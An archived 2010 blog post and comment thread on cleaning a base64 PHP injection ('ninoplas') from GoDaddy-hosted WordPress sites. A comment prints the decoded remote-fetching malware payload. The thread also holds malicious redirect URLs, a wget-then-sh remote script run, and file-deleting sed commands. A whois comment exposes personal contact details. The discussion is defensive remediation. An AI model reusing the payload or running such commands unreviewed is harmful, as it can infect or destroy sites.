Inspirated


March 2, 2010

GoDaddy/WordPress ninoplas Base64 virus and the fix

Filed under: Blog — admin @ 7:40 pm

Update: The virus seems to have affected only GoDaddy websites, hence the change in title.

A few hours ago I opened my website and noticed some rather strange JavaScript hanging around the bottom. After some inspection, it became evident that every page on my blog was trying to load an IFrame from some place called ninoplas.com. Turns out, I wasn’t alone and there are other users as well who are affected by this. Judging by the fact that different blogs were attacked at the same time, this was in all probability the result of a security hole in some plugin or the core itself.

The virus acted by adding a piece of obfuscated (base64-encoded) code on the first line of all PHP files on the server. It’s rather unsettling to consider the extent of damage that could have been caused with write access to those files. Still, the damage could be rectified by simply deleting those lines. I wrote a tiny script for doing this job which cleans the ninoplas virus from all the PHP files in the current directory:

clean-ninoplas.sh

Warning: While this script has worked for me, I am in no way providing any guarantee for how it behaves on other blogs. Backup your blog as well as database before executing this script.
You have been warned.

Using the fix is a simple matter of:

-bash-$ cd wordpress
-bash-$ wget http://inspirated.com/uploads/clean-ninoplas.sh
-bash-$ sh clean-ninoplas.sh

And don’t forget to backup everything again after cleaning up. The security hole — if there is one — has still not been tracked down, and if it’s in the core or some plugin which you’re still using, the virus might not be so benign next time.
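As an added example (my own, not the clean-ninoplas.sh linked above, whose contents do not appear on this page), here is a POSIX shell script that does the three things a cleanup of this kind needs: list the PHP files whose first line carries an eval(base64_decode( injection, decode that payload for triage without executing it (the safe counterpart of the eval-to-print trick discussed in the comments), and strip only that first line while keeping a .bak copy. The MARKER string, the directory layout and the sample payload are constructed assumptions; the actual needle on an infected site may differ, so adjust MARKER to match what you see on line 1.

```shell
#!/bin/sh
# Added example: detect, triage and remove a one-line eval(base64_decode(...))
# injection prepended to PHP files. Not the clean-ninoplas.sh from the post.
set -eu

# Assumed marker for this injection family; only line 1 of each file is checked.
MARKER='eval(base64_decode('

# Print every *.php file under $1 whose FIRST line contains MARKER.
list_infected() {
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if head -n 1 "$f" | grep -qF "$MARKER"; then
            printf '%s\n' "$f"
        fi
    done
}

# Number of infected files under $1 (useful before/after a cleanup run).
count_infected() {
    list_infected "$1" | wc -l | tr -d ' '
}

# Decode the base64 argument from line 1 of $1 WITHOUT running it, so the
# payload (e.g. the remote URL it fetches) can be read safely.
decode_payload() {
    head -n 1 "$1" \
      | sed -n "s|.*base64_decode([\"']\{0,1\}\([A-Za-z0-9+/=]*\).*|\1|p" \
      | base64 -d
}

# Remove the injected first line from every infected file under $1, keeping
# a .bak copy next to it. With DRY_RUN=1 nothing is modified.
clean_tree() {
    list_infected "$1" | while IFS= read -r f; do
        if [ "${DRY_RUN:-0}" = 1 ]; then
            printf 'would clean %s\n' "$f"
            continue
        fi
        cp -p "$f" "$f.bak"          # preserve mode/owner, keep an untouched copy
        tail -n +2 "$f.bak" > "$f"   # everything except the injected line 1
        printf 'cleaned %s\n' "$f"
    done
}

# Constructed sample tree (not real infected files): one injected PHP file in a
# subdirectory and one clean file, built in a temporary directory.
make_sample() (
    dir=$(mktemp -d)
    mkdir -p "$dir/wp-content"
    # Harmless stand-in for the real dropper; the URL is a reserved .invalid name.
    payload='echo "CONSTRUCTED-PAYLOAD: would have fetched http://remote.invalid/link.php";'
    b64=$(printf '%s' "$payload" | base64 | tr -d '\n')
    printf '<?php /**/eval(base64_decode("%s")); ?>\n<?php\necho "index";\n' "$b64" \
        > "$dir/wp-content/index.php"
    printf '<?php\necho "clean";\n' > "$dir/clean.php"
    printf '%s\n' "$dir"
)

# Demo run on the constructed tree only; real use: clean_tree /path/to/account/root
SAMPLE_DIR=$(make_sample)
echo "infected before: $(count_infected "$SAMPLE_DIR")"
echo "payload of wp-content/index.php (decoded, not executed):"
decode_payload "$SAMPLE_DIR/wp-content/index.php"; echo
DRY_RUN=1 clean_tree "$SAMPLE_DIR"
clean_tree "$SAMPLE_DIR"
echo "infected after: $(count_infected "$SAMPLE_DIR")"
rm -rf "$SAMPLE_DIR"
```

Run it as `DRY_RUN=1 clean_tree /path/to/account/root` first and check the list, then without DRY_RUN, and from the account root rather than a subdirectory, so no infected file is left behind to re-infect the others. Because only line 1 is inspected and removed, legitimate code that calls base64_decode further down in a file is left alone, which a blanket `sed '/base64_decode/d'` over every file would not guarantee.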


70 Comments »

  1. I’ve changed the needle value to the base64 code found on all of my infected php files.
    Can you please tell me how to execute this script?
    I’m a newbie in bash.
    Where do I input these commands: cd; wget; sh ?

    Comment by Jugal — March 3, 2010 @ 3:21 am

  2. You need SSH access for entering these commands.

    Seeing as this is probably a GoDaddy issue, this link might help.

    Comment by krkhan — March 3, 2010 @ 7:38 pm

  3. Thanks mate, I’ll try doing this.
    On second thoughts, can’t we make a php script to do the same?

    Comment by Jugal — March 3, 2010 @ 10:37 pm

  4. Can you email me an infected PHP file? I will need that in order to write a PHP script for automating cleanup.

    Comment by krkhan — March 3, 2010 @ 11:18 pm

  5. Thanks for the time mate, please add me on jugal1702@gmail.com I’ll send you there!

    Comment by Jugal — March 3, 2010 @ 11:21 pm

  6. Thanks a lot for the help Kamran. I used the php script you gave.
    Only 1 problem remains now: I had to use the replacement string as ‘ ‘ (space) as a blank was not accepted.
    So now I have a space and a blank line before every <?php (<?php starts from the 2nd line) and hence no files are working :(
    Any idea how to batch remove the 1st line?

    Comment by Jugal — March 7, 2010 @ 2:06 am

  7. I am suffering from the same virus, can you please send me the php script to resolve this issue.

    Comment by Srinivas Bobbili — March 8, 2010 @ 12:34 pm

  8. Hi Srinivas, Kamran is busy. Please post your email id, I’ll give it to you.
    Really appreciate his help!

    Comment by Jugal — March 8, 2010 @ 7:15 pm

  9. Jugal, a space and a blank line before start of PHP code should be fine. Anyways, email me some sample PHP files and I’ll have a look.

    Comment by krkhan — March 8, 2010 @ 8:02 pm

  10. This is not new.. it’s NOT ONLY Godaddy that gets infected.. try searching for: eval base64_decode
    Also look at (oct 2009) : http://www.hostmonsterforum.com/showthread.php?t=6518

    Comment by Danny — March 13, 2010 @ 6:58 pm

  11. One more thing (I have also tracked this back to 2007) – If you want to know what the code does.. do this:

    Edit the .php file and change “eval” to “print”

    You will see the decoded file like this:

    $l="http://tourreviews.asia/links2/link.php"; if (extension_loaded("curl")){ $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch);} else{$r=implode("",file($l));} print @$r;

    Clearly they can change the remote file to do or say anything.

    NOTE: The most important part of this is that your system has been HACKED.
    It is very likely based on the history of this PHP attack that you might have Spyware on your PC that stole your FTP passwords.
    Maybe you have FTP passwords in your email account and that was hacked.
    Do you store your FTP passwords in a text file on your PC?
    Or depending on some versions of WordPress there is a forum/plugin/comment hack that might have been the cause.
    Anyway I suggest you fix your server, scan you pc and change your passwords.

    Remember this is for any Web Server running PHP – Its not specific to WordPress etc.. and not Hosting specific either.

    Comment by Danny — March 13, 2010 @ 7:24 pm

  12. Danny, I am on Linux and I keep a sharp eye on currently executing processes all the time so I have ruled out the spyware scenario. My email account was not hacked or I would have known as I keep a sharp eye on email access too. This leaves a possible security hole in some plugin/core itself.

    How were you able to trace the issue back to 07? That’s interesting to say the least.

    Comment by krkhan — March 13, 2010 @ 10:44 pm

  13. @above 2: Did you also think that you have the database password in the config.php file? Can that be the loophole?

    Btw, I still have the spaces and my files still are not working. Can anyone please provide a script to remove them?

    Comment by Jugal — March 14, 2010 @ 2:19 pm

  14. @Jugal: Oh yes I do! Contact me on killer_kado@inspirated.com

    Comment by Gobhi — March 14, 2010 @ 6:27 pm

  15. Remember this is for any Web Server running PHP – Its not specific to WordPress etc.. and not Hosting specific either.

    Comment by zainuddin — April 1, 2010 @ 3:27 pm

  16. Frankly speaking, the origins of this virus are pretty vague. Though it seems to have affected GoDaddy websites with PHP running.

    Comment by krkhan — April 1, 2010 @ 7:19 pm

  17. When I finally get rid of all the instances of this code, is there a way to be sure there is not a “back door” I have missed???

    I just got hit with this thing at the stroke of midnight, April 1st. The last interested person to successfully register on my website did it last night at 11:00pm. When GoDaddy walked me through restoring with their backup (saved just after midnite), the malicious code was already there. It looks like the code was inserted as the first line in nearly every php file way back on Feb 28th, and it was lurking there until April Fools.

    I am inept with scripts so I have begun the tedious job of removing the code from what will probably be hundreds of php files on my WordPress site.

    Happy Easter to all
    Mike Blackstone

    Comment by Mike Blackstone — April 4, 2010 @ 12:34 pm

  18. Change that: I got hit at the stroke of midnight Apr 2nd, NOT the 1st.

    Comment by Mike Blackstone — April 4, 2010 @ 12:42 pm

  19. Information about ninoplas.com from http://www.robtex.com

    *.ninoplas.com has one IP number, which is the same as for ninoplas.com. ninoplas.com points to the same IP. ninoplas.com is delegated to two nameservers, however two extra nameservers are listed in the zone. *.ninoplas.com is ranked #9276993 world wide as ninoplas.com and is hosted on a server in China. Reputation is not yet known. It is not listed in any blacklists.

    Comment by G.J.Souverein — April 11, 2010 @ 4:58 am

  20. Whois information:

    Domain name: ninoplas.com

    Registrant Contact:
    NewCompany ltd
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Administrative Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Technical Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    Billing Contact:
    Todd Echols moonbeam@konocti.net
    7079983776 fax: 0
    3272 spring valley rd
    clearlake oaks CA 95423
    us

    DNS:
    ns1.everydns.net
    ns2.everydns.net

    Created: 2010-02-05
    Expires: 2011-02-05

    There is some more information about Todd Echols on
    http://www.malwaredomainlist.com/mdl.php?search=91.212.198.137&inactive=on

    Comment by G.J.Souverein — April 11, 2010 @ 5:30 am

  21. Hi Khan,

    My blog hosted with Godaddy has also been hacked.

    I have stated my issue here:
    http://forums.digitalpoint.com/showthread.php?t=1770144

    And I have spent one whole night deleting the “eval base 64” code
    from wp-admin, wp-content and wp-includes. But later i found that
    the whole php files inside my FTP has the eval code at the top.

    Could you please help me on fixing this?

    Like, how to use your script given above. I have no idea on how to use it.

    Thanks in advance.

    Comment by Hema Latha — April 16, 2010 @ 7:39 am

  22. I’m running a wordpress site and everything is seemingly cleansed from my server. All thanks to everything posted above.

    However, I still have that pesky piece of javascript on the main page source. I’m able to follow code, but I just can’t locate how to edit that line out. Any suggestions on a location to check? I’ve checked all my index.php files and nothing yet.

    Comment by Derek — April 16, 2010 @ 6:11 pm

  23. Hi Derek, I think you are on the right track. I had to check every single .php file on my entire wordpress site and delete that code—it was . If I had to guess, there was one .php file you somehow missed. It was a painstaking process, checking and deleting the code from every single file, but it worked for me.

    As far as the script, my understanding is that it automates and completes that painstaking process for you. I don’t know script either so I did it the hard way manually.

    All the best

    Comment by Mike Blackstone — April 16, 2010 @ 8:34 pm

  24. […] found an article on how to remove it using SSH access, you can check it out here. (Note: I have not tried this script, so I can't say whether it works or […]

    Pingback by WordPress Site Hacked – Ninoplas Base64 Virus | WPSecurityLock — April 17, 2010 @ 1:05 am

  25. Jugal or Kamran can you please mail me the PHP or SSH script to this email address? sandeep[AT]gadgetcage[DOT]com

    Comment by Sandeep — April 17, 2010 @ 1:53 am

  26. For people who’re using GoDaddy account, cleaning the script is actually very easy using SSH access. Here‘s an article which explains how to enable SSH access on your account. Once you have enabled SSH access, use these instructions to login and then use the clean-ninoplas commands listed in the blog post.

    Not only SSH access saves you time, it also makes sure that the virus is purged clean from every PHP file in your account.

    Comment by krkhan — April 17, 2010 @ 11:10 pm

  27. Thanks for this great information and the removal info.

    Regarding SSH, for those that do not have SSH enable at Godaddy it can take up to 72 hours to activate. Any ideas on how to speed things along?

    I’ve been restoring people’s sites through the file manager using the “History” snapshot feature. Have you heard any new information about it’s origin or whether or not it affects the database?

    I received one comment on my blog that this virus sets a cookie that redirects every 20 days. Have you heard anything about this?

    Securely yours,

    Regina Smola

    Comment by WPSecurityLock — April 18, 2010 @ 1:44 am

  28. […] this solution, I came to know that 200+ WordPress blogs are attacked on 14th April, 2010. I found a solution for how to clean this base64 virus for Goddady users. But after executing that code, I can still […]

    Pingback by How to Get rid of base64 Virus on WordPress | Gadget Cage — April 19, 2010 @ 8:03 pm

  29. HELP! My website has also been attacked by something similar to this. I need help! I have the file, but do not know how to run it. My site is http://www.thetechupdate.com and it has been hacked.

    Help! Email me henry{at}thehenry.net

    Comment by Henry D'Andrea — April 22, 2010 @ 11:15 am

  30. […] you have SSH access on your Godaddy  Linux shared hosting account, then you can try the clean-ninoplas.sh script written by krkhan at http://inspirated.com. Since these webmasters did not have SSH enabled, […]

    Pingback by Ninoplas Base64 WordPress Hacked on Godaddy | Case Study | WPSecurityLock — April 22, 2010 @ 5:45 pm

  31. Henry, feel free to contact me at my website. If you don’t have SSH access, then maybe this post may help you – http://www.wpsecuritylock.com/ninoplas-base64-wordpress-hacked-on-godaddy-case-study/

    Comment by WPSecurityLock — April 22, 2010 @ 5:47 pm

  32. For people who’re having problems executing the script:

    1. Enable SSH on your account
    2. Login using SSH
    3. Execute the following commands:

      wget http://inspirated.com/uploads/clean-ninoplas.sh
      sh clean-ninoplas.sh

    Feel free to comment if you're having any problems with the above steps.

    Comment by krkhan — April 22, 2010 @ 11:30 pm

  33. My old version (2.6/2.7/2.8) WordPress sites at a particular host who is reseller of WildWestDomains, were also attacked yesterday by an “eval base64…” injection. Fortunately I had zip backups of the site folders which I restored and then upgraded the WordPress installations. This removed the malware (hopefully) as the sites are now working.

    I believe, the attacks are happening on WordPress sites with older version installations and it would do well to upgrade all your WordPress installations to the latest version 2.9.2.

    Comment by Sri — April 25, 2010 @ 5:08 pm

  34. @ Sri ..

    The attacks are regardless of the wp versions.

    My site was running the latest wp version and it was hacked.
    Still i couldn’t figure out how it was hacked !

    Comment by Hema Latha — April 25, 2010 @ 5:35 pm

  35. @ K R Khan ..

    “Update: The virus seems to have affected only GoDaddy websites, hence the change in title.”

    Godaddy has denied this when we contacted them via email. Here’s the reply:

    “Measures are in place to protect the overall security of the shared hosting server on which your website resides. The compromise of your account is outside of the scope of security that we provide for you. Virus scans are performed on the content that is hosted, but they may not pick up everything, largely due to the fact that hackers tend to upload custom scripts which are not picked up by traditional malware scanners. However, if a virus is detected, you will be notified. The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you. ”

    Is there anyway to find out how our site’s were hacked ???

    Comment by Hema Latha — April 25, 2010 @ 5:39 pm

  36. […] like to quote a comment submitted by Herma Latha at inspriated.com. "Measures are in place to protect the overall security of the shared hosting server on which your […]

    Pingback by Cechriecom.com Script – WordPress Hacked on Godaddy | Case Study | WPSecurityLock — April 25, 2010 @ 9:11 pm

  37. GoDaddy’s reply is a lot of corporate speak bullcrap. It goes by the assumption that the users’ blogs and website software can be compromised using exploits and vulnerabilities and social engineering but somehow the hosting servers themselves are prone to everything except viruses which they are scanned for.

    In all probability, this spreads using an exploit of some server-side software. Which is evident from the fact that:

    • There’s a clear bias in victim base, i.e., all the victims share a common hosting company instead of a common WP version.
    • Most of the users who’re hit by this thing had most recent WP versions.
    • I have only heard about one or two hosts where this problem persists.

    Comment by krkhan — April 25, 2010 @ 10:02 pm

  38. Hi,

    I used another ssh command found on a wordpress.org comment and it worked for me. It scans all php files for the base64 code and removes it. The command looks like this: find . -type f -name "*.php" -exec sed -i '/base64_decode/d' {} \; , I detailed everything in an article regarding this and how to use it here: http://bit.ly/d5QKsT

    BTW, my comments seem not to appear in the website….maybe they got into your spam folder, can you please check and unspam them?

    Regards,
    Rudi

    Comment by Rudi — April 26, 2010 @ 11:31 am

  39. Rudi, thanks for posting the new script. It does essentially the same thing as the one I have made; there is more than one way to get the job done.

    Please tell me if you’re facing any further problems with commenting.

    Comment by krkhan — April 27, 2010 @ 3:49 am

  40. […] is GoDaddy’s comment (submitted by Herma Latha at inspriated.com): Measures are in place to protect the overall security of the shared hosting server on which your […]

    Pingback by Wordpress blogs hosted on GoDaddy Hacked « Make This Do – Making The Web Work For You — April 27, 2010 @ 6:04 am

  41. Hi, let’s see if the comment works :)

    Comment by Rudi — April 28, 2010 @ 1:28 pm

  42. How to do that for Joomla CMS . please advice ?

    Comment by Bassem — May 1, 2010 @ 5:58 pm

  43. IT’S NOT just godaddy! It’s LOTS of ISPs.

    Comment by ed — May 1, 2010 @ 10:12 pm

  44. WORDPRESS BLOG HACKED AGAIN ……… !!!!!!!!!

    My blog is hacked again.
    I have cleared everything and changed the passwords, installed security plugins. But now my site is hacked again.

    It again has the same script in the Page Source:

    And my antivirus program has blocked my site and giving an Alert.
    Site is getting redirected to the below link.

    http:// www1.protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCcU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5do3OL1cytnpl2Wp6dpJ6eU9rPlqdqWpuooV6UYl6XY5eSlWVsYGiYk4mrl5p2nKyoqHOQXM3UlZmOopmh1pnVk5zbj5HH0p5mWKrYnpRraWZwaGhlaHCHodeYbmFfa2RvmF2TYGeMkMahrH9dqZ%2FJnptyag%3D%3D

    All the php files have this code on the first line:

    I feel to Quit blogging.

    Comment by Hema Latha — May 2, 2010 @ 12:28 am

  45. Happened to me again at 6am today.

    This is the fifth time this virus has got me. The last time was about two weeks ago.
    I think this has to be an exploit in Godaddy.

    Comment by Bourgy — May 2, 2010 @ 2:06 am

  46. Hema, I know exactly how you feel. I am tired of cleaning up files. This time I almost lost two thousand pictures I uploaded because I just deleted my entire WordPress folder out of exasperation.

    Luckily I had a backup I made 10days ago.

    Comment by Bourgy — May 2, 2010 @ 2:08 am

  47. Maybe it’s time for us to compare plugins if it’s not just godaddy.

    Are we all using All in One?

    Comment by Bourgy — May 2, 2010 @ 2:11 am

  48. @ Bourgy .. Yes, I thought about the plugins. I want to list the plugins I use, but I’m unable to login now.

    I restored all the files using Godaddy File Manager.

    Site is working and I am unable to find the kdjkfjskdfjlskdjf script in the page source and the eval base code in the php files.

    But when i tried to Login to Wp-admin, I got this message from AVG:

    Threat was blocked!

    File name: http: / / www1 . protectsys28-pd.xorg.pl/?p=p52dcWpkbG6HjsbIo216h3de0KCfYWCdU9LXoKitioaLw8ydb5aYen5arK3NasiXk2Rea2JrmV2ZVqPajtfZ1m5oWKeih9eipqCecV6aoaXGaorcmpWkcVih1GqTYmKUXpmYkWNrZ2SXlJVfpJmfcaCorKmbXJPPn5SWlaCfzZ%2FOo5PSosWSxqCkYa3Vjs%2BomZ2nYqicqHjTksjPo5WQqJGs02rKpKTWUpaliGN9V2irytGdm5Wnm6GmpKzEmdnIX5OcoVdqqqTSXZHKmszSiGN9WKrYnpRraWZwaHBrbm%2BHodeYbmFfa2RvmGWZZmaMkMahrH9dqZ%2FJnptyag%3D%3D

    Threat name: Exploit Rogue Security Threat Analysis 9type 1007)

    I’m unable to access the wp admin/login panel.

    Comment by Hema Latha — May 2, 2010 @ 2:34 am

  49. On 1st May, 2010 around 10:30 PM (IST) I checked my site and it was not affected.
    After an hour when I tried to access my site it was gone, redirecting to a blank page and followed by an AVG Alert message.

    THIS IS THE SECOND TIME MY SITE IS HACKED .. !

    After the first attack, I’m using a VERY STRONG password, and installed wp-security plugins suggested by WpSecurityLock.

    I have restored using Godaddy File Manager and the base eval codes have been removed.
    But still when I try to login to Wp-admin, the same issue happens again.

    As suggested by Bourgy, let me list the WP-PLUGINS i use, so that we can compare the commons plugins the hacked sites are using.

    akismet
    all-in-one-seo-pack
    clean-options
    dd-formmailer
    easy-ip2country
    exclude-pages
    exploit-scanner
    facebook-commentstng
    featured-content-gallery
    flv-embed
    get-recent-comments
    gocodes
    google-sitemap-generator
    hide-or-cut-post-text
    link-exchange-for-wp
    login-lockdown
    maintenance-mode
    php-code-widget
    seo-automatic-links
    seo-image
    seo-super-comments
    sexybookmarks
    sitemap-generator
    thank-me-later
    tweetmeme
    wordpress-popular-posts
    wp-pagenavi
    wp-postviews
    wp-secure-remove-wordpress-version
    wp-super-cache
    wp-thumbie

    Previously when my site was hacked, I had a strange PHP file “lira_seville.php”
    But this time I couldn’t find any. And no weird code in wp-config.

    I guess changing host will fix this issue for ever !

    Comment by Hema Latha — May 2, 2010 @ 3:20 am

  50. have you cleaned your system?
    Deleted cookie etc.

    You really should. Try downloading CCleaner

    Comment by Bourgy — May 2, 2010 @ 3:23 am

  51. ISSUE RESOLVED TEMPORARILY

    1. Restored files using Godaddy file manager.

    After restoration, site worked but the Login/Admin page was redirected to the virus site.

    2. Replaced Wp-admin & Wp-includes.

    Issue resolved.

    WAITING FOR THE THIRD ATTACK

    Comment by Hema Latha — May 2, 2010 @ 4:46 am

  52. I fixed the virus on my site using the script provided in the post, which deleted the code from every PHP line automatically. Then I chose a strong password and since then I haven’t been hit by the thing again.

    I guess the difference is, I used the script in my root directory and hence all PHP files were cleaned. Cleaning them by hand or cleaning them in a subdirectory is bound to leave some infected ones and they can in turn re-infect all the other files.

    I have many of those plugins as well, but it will be difficult figuring out which one is the culprit.

    And please make regular backups :) .

    Comment by krkhan — May 2, 2010 @ 12:22 pm

  53. […] a topic in the WordPress support forums that supported that approximate time. However, I also found another post elsewhere with a Unix/Linux shell script that would fix what appears to be the same issue which was […]

    Pingback by Arcane Palette Creative Design » Blog Archive » GoDaddy-hosted sites at risk — WordPress, Joomla!, Pligg, ZenCart, others… :: creative web design — May 4, 2010 @ 1:26 am

  54. […] a topic in the WordPress support forums that supported that approximate time. However, I also found another post elsewhere with a Unix/Linux shell script that would fix what appears to be the same issue which was […]

    Pingback by jazzsequence :: arcane palette :: GoDaddy-hosted sites at risk — WordPress, Joomla!, Pligg, ZenCart, others… — May 4, 2010 @ 8:57 pm

  55. I have 100 domains on Godaddy and i can say that this company is very reputable.

    Comment by Nevaeh Green — May 5, 2010 @ 1:03 pm

  56. Yes, godaddy is pretty ok by me, and I do host lots of sites there.

    however they were hit by this virus, big time. I think they should have been a bit more on top of it. just saying.

    Comment by ed — May 5, 2010 @ 2:17 pm

  57. Go Daddy is making strong efforts to reach out to the community. Today, they are going to be speaking at our free WordPress Security teleseminar at 2pm EST. We welcome you to join us: http://www.wpsecuritylock.com/wpsecurity0505

    Comment by WPSecurityLock — May 5, 2010 @ 7:52 pm

  58. […] after the virus was first identified, someone helpful at Inspirated.com released a script to fix the problem. Fixing the process manually is very difficult because when the site is compromised, every PHP file […]

    Pingback by Manually Correcting the GoDaddy Wordpress Virus Ninoplas | Finding Great Web Hosting — May 10, 2010 @ 2:05 am

  59. Is it possible for a Javascript command to get to the php code in order to modify them (adding the eval(base64 lines in each .php file) that way?

    I suspect of a click tracking (which generates a “heat map” of your site) from time ago.

    My partner recommended it me, because “all SEO use it” but when I traced the code, it was hosted in a public place, not in a proud programmer’s site as a honest company would do…
    http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/5758.js

    The script was full of encrypted functions.

    Is that possible?

    I have a Linux Deluxe account too.
    Too many coincidences?

    Last, I’d suspect some plugins I installed with 0 feedback and (surprisingly) didn’t work at all. That last one I call “stupidity” on my part.

    Comment by sergio — May 11, 2010 @ 11:07 am

  60. Here’s my php code that can be run from the browser. You MUST edit this to suit your situation.

    You must have safe mode off in php for it to work. Please read the comments inline.

    <?php
    // Edit this to the base64 string found at the top of your own infected files
    // (the value below is an elided placeholder, not a complete needle)
    $needle = 'aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJ . . . .  edit this for your specific base64_encode';

    // Edit this to the directory you want scanned
    $root = '/home/content/your/path/to/html';

    // Quote both values for the shell so the base64 characters (+ / =) reach grep literally
    $needle_arg = escapeshellarg($needle);
    $root_arg   = escapeshellarg($root);
    // Exclude this script itself: it contains $needle too, so grep would list it
    // and sed would strip its own "<?php" line
    $self = escapeshellarg(basename(__FILE__));

    $output = '';

    //Uncomment if you need to find your path
    //$output = shell_exec("pwd");

    //Uncomment to check for infected files (-F: needle is a fixed string, -l: file names only)
    //$output = shell_exec("grep -rlF --include='*.php' --exclude=$self $needle_arg $root_arg");

    //Uncomment to clean up infected files: delete the first line of every file grep listed
    //(-Z / -0 keep file names with spaces intact between grep and xargs)
    //$output = shell_exec("grep -rlZF --include='*.php' --exclude=$self $needle_arg $root_arg | xargs -0 sed -i '1d'");

    //Output (escaped, since this page is viewed in the browser)
    echo '<pre>' . htmlspecialchars((string) $output) . '</pre>';
    ?>

    Comment by carcus — May 12, 2010 @ 1:10 pm

  61. @sergio: AFAIK, this JS script does nothing like that. It just redirects. We still don’t know how it got there in the first place.

    @carcus: Thanks for the script. Hope it helps the others.

    Comment by krkhan — May 12, 2010 @ 2:48 pm

  62. @carcus – Thanks a ton for the php script. Just used it to clean up a whole slew of infected WP sites. You’re a life-saver!

    Comment by Justin — May 14, 2010 @ 1:21 am

  63. Glad I could help. Here’s a tip: make it non-writeable after you use it and make sure to comment out what you don’t want to be run again. Our clean up script got hit and run again, removing the first line of every file recursively from root. Client did not keep good backups. Use at your own risk!

    Comment by carcus — May 14, 2010 @ 5:24 am

  64. Hi.
    I have had my godaddy website hacked with this virus 5 times in the last 3 weeks. I am now savvy enough to backup a clean copy (at least I think it’s clean) every night, and as I make constant daily changes have virtually been able to pick the exact time the virus infects again and quickly grab my backup and upload straight away which seems to delete the virus from ALL my websites infected but then it comes back within a few days.

    As these websites are not WP sites as most people seem to have had problems with, can I do the SSH thing above to get rid of it or any suggestions as I can’t do the restore with godaddy due to the amount of changes done during the day and any restore could have part of the malicious code on it anyway.

    I manually go through and clean every .php page but wonder if I am missing something on other types of pages.

    I need some layman terms in what I need to do to clean it off forever. I have deleted any databases I had, all forum stuff everything to try not to let it come back including changing all passwords on hosting, ftp and account with godaddy

    Appreciate any advice thanks
    Serena

    Comment by serena — May 17, 2010 @ 5:51 pm

  65. I have also been a victim of the ninoplas virus, but am happy to say I was able to remove it by doing a little searching.

    I was looking for an alternative to reinstalling all the original wordpress files, plugins, themes, etc., so I looked through a number of different files and didn’t find anything until I got to the files in my themes folder.

    THE ONLY FILE THAT WAS INFECTED WAS THE HEADER.PHP FILE IN THE NAKED_HTML5 THEME. THERE WAS A LONG STRING OF CODE ADDED TO THE TOP ABOVE THE OPENING TAG. ONCE I REMOVED THE STRING OF CODE THE PROBLEM WAS FIXED!!!

    Comment by Adam — May 19, 2010 @ 9:43 am

  66. I uninstalled every copy of WordPress that I had on my site and deleted my WordPress database after backing it up and moving the backup off of my server, and guess what? I STILL got hacked again. And then I found out that I had a folder in the top level directory that was publicly writable. I deleted that and I haven’t had any problems so far.

    Comment by spo — May 19, 2010 @ 7:46 pm

  67. I have also been a victim of the ninoplas virus, but am happy to say I was able to remove it by doing a little searching.

    I was looking for an alternative to reinstalling all the original wordpress files, plugins, themes, etc., so I looked through a number of different files and didn’t find anything until I got to the files in my themes folder.

    THE ONLY FILE THAT WAS INFECTED WAS THE HEADER.PHP FILE IN THE NAKED_HTML5 THEME. THERE WAS A LONG STRING OF CODE ADDED TO THE TOP ABOVE THE OPENING TAG. ONCE I REMOVED THE STRING OF CODE THE PROBLEM WAS FIXED!!!

    Comment by Bruce — May 19, 2010 @ 9:24 pm

  68. Long time viewer / first time poster. Really enjoy reading the blog, keep up the good work. Will definitely start posting more in the near future.

    Comment by Robena Eng — October 23, 2010 @ 2:17 pm

  69. godaddy is not always the best registrar, the private registration of godaddy is too expensive -

    Comment by Concrete Molds · — November 8, 2010 @ 3:30 pm

  70. check out this url

    GoDaddy/WordPress ninoplas Base64 virus and the fix | Inspirated

    Trackback by check out this url — November 27, 2014 @ 5:23 pm
